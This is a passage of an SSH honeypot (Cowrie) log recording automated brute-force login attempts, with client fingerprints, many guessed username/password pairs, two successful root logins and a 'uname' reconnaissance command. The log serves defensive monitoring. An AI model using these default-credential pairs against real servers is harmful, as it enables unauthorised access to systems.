,"aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:11:45.053030Z","src_ip":"212.227.235.229","session":"dccfc420c98b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37216,"dst_ip":"1.2.3.4","dst_port":22,"session":"7521be83b67f","protocol":"ssh","message":"New connection: 212.227.125.160:37216 (1.2.3.4:22) [session: 7521be83b67f]","sensor":"my-vps","timestamp":"2025-08-31T01:11:45.811331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:45.812367Z","src_ip":"212.227.125.160","session":"7521be83b67f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:45.888654Z","src_ip":"212.227.125.160","session":"7521be83b67f"}
{"eventid":"cowrie.login.failed","username":"test","password":"scricideea","message":"login attempt [test/scricideea] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:46.004246Z","src_ip":"212.227.235.229","session":"dccfc420c98b"}
{"eventid":"cowrie.login.failed","username":"esadmin","password":"esadmin","message":"login attempt [esadmin/esadmin] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:46.125057Z","src_ip":"212.227.125.160","session":"7521be83b67f"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:47.248088Z","src_ip":"212.227.235.229","session":"dccfc420c98b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:47.282357Z","src_ip":"212.227.125.160","session":"7521be83b67f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48394,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c960fd7e218","protocol":"ssh","message":"New connection: 212.227.125.160:48394 (1.2.3.4:22) [session: 1c960fd7e218]","sensor":"my-vps","timestamp":"2025-08-31T01:11:50.811486Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52600,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ca55a75f556","protocol":"ssh","message":"New connection: 212.227.235.229:52600 (1.2.3.4:22) [session: 7ca55a75f556]","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.036147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.037049Z","src_ip":"212.227.235.229","session":"7ca55a75f556"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.104494Z","src_ip":"212.227.235.229","session":"7ca55a75f556"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.174981Z","src_ip":"212.227.125.160","session":"1c960fd7e218"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.208728Z","src_ip":"212.227.125.160","session":"1c960fd7e218"}
{"eventid":"cowrie.login.failed","username":"temp","password":"temp","message":"login attempt [temp/temp] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:51.413974Z","src_ip":"212.227.235.229","session":"7ca55a75f556"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:52.481643Z","src_ip":"212.227.235.229","session":"7ca55a75f556"}
{"eventid":"cowrie.login.failed","username":"dev","password":"1234567","message":"login attempt [dev/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:52.762947Z","src_ip":"212.227.125.160","session":"1c960fd7e218"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:54.070757Z","src_ip":"212.227.125.160","session":"1c960fd7e218"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55560,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffbebb24aec8","protocol":"ssh","message":"New connection: 212.227.125.160:55560 (1.2.3.4:22) [session: ffbebb24aec8]","sensor":"my-vps","timestamp":"2025-08-31T01:11:56.285056Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:56.286503Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:56.358911Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw2","message":"login attempt [root/1qazxsw2] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:11:56.747973Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:11:56.986474Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:11:56.987226Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:57.061190Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:57.062228Z","src_ip":"212.227.125.160","session":"ffbebb24aec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39628,"dst_ip":"1.2.3.4","dst_port":22,"session":"94e24f899301","protocol":"ssh","message":"New connection: 212.227.125.160:39628 (1.2.3.4:22) [session: 94e24f899301]","sensor":"my-vps","timestamp":"2025-08-31T01:12:02.496991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:02.497958Z","src_ip":"212.227.125.160","session":"94e24f899301"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52972,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb6a5b56f98a","protocol":"ssh","message":"New connection: 212.227.125.160:52972 (1.2.3.4:22) [session: eb6a5b56f98a]","sensor":"my-vps","timestamp":"2025-08-31T01:12:06.774479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:06.775240Z","src_ip":"212.227.125.160","session":"eb6a5b56f98a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:06.849043Z","src_ip":"212.227.125.160","session":"eb6a5b56f98a"}
{"eventid":"cowrie.login.failed","username":"flask","password":"123456","message":"login attempt [flask/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:07.201330Z","src_ip":"212.227.125.160","session":"eb6a5b56f98a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:08.347283Z","src_ip":"212.227.125.160","session":"eb6a5b56f98a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48278,"dst_ip":"1.2.3.4","dst_port":22,"session":"790b2dd660cb","protocol":"ssh","message":"New connection: 212.227.235.229:48278 (1.2.3.4:22) [session: 790b2dd660cb]","sensor":"my-vps","timestamp":"2025-08-31T01:12:12.220542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:12.221508Z","src_ip":"212.227.235.229","session":"790b2dd660cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58868,"dst_ip":"1.2.3.4","dst_port":22,"session":"70550c348d2d","protocol":"ssh","message":"New connection: 212.227.125.160:58868 (1.2.3.4:22) [session: 70550c348d2d]","sensor":"my-vps","timestamp":"2025-08-31T01:12:17.293331Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:17.294262Z","src_ip":"212.227.125.160","session":"70550c348d2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:17.368012Z","src_ip":"212.227.125.160","session":"70550c348d2d"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:17.933030Z","src_ip":"212.227.125.160","session":"70550c348d2d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:19.009842Z","src_ip":"212.227.125.160","session":"70550c348d2d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39490,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b32641d94bf","protocol":"ssh","message":"New connection: 212.227.125.160:39490 (1.2.3.4:22) [session: 6b32641d94bf]","sensor":"my-vps","timestamp":"2025-08-31T01:12:24.694447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:24.695515Z","src_ip":"212.227.125.160","session":"6b32641d94bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36474,"dst_ip":"1.2.3.4","dst_port":22,"session":"6509a5af6cb6","protocol":"ssh","message":"New connection: 212.227.125.160:36474 (1.2.3.4:22) [session: 6509a5af6cb6]","sensor":"my-vps","timestamp":"2025-08-31T01:12:27.717434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:27.718241Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:12:27.791160Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:12:28.236742Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:12:28.474860Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:12:28.475532Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:28.550004Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:12:28.551016Z","src_ip":"212.227.125.160","session":"6509a5af6cb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39494,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6c1ddde4aea","protocol":"ssh","message":"New connection: 212.227.235.229:39494 (1.2.3.4:22) [session: c6c1ddde4aea]","sensor":"my-vps","timestamp":"2025-08-31T01:12:30.531733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:31.573184Z","src_ip":"212.227.235.229","session":"c6c1ddde4aea"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:12:31.573866Z","src_ip":"212.227.235.229","session":"c6c1ddde4aea"}
{"eventid":"cowrie.login.failed","username":"dev","password":"12345678","message":"login attempt [dev/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:12:37.777018Z","src_ip":"212.227.235.229","session":"c6c1ddde4aea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39680,"dst_ip":"1.2.3.4","dst_port":22,"session":"434baef17257","protocol":"ssh","message":"New connection: 212.227.125.160:39680 (1.2.3.4:22) [session: 434baef17257]","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.174737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:12:38.175602Z","src_ip":"212.227.125.160","session":"434baef17257"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-c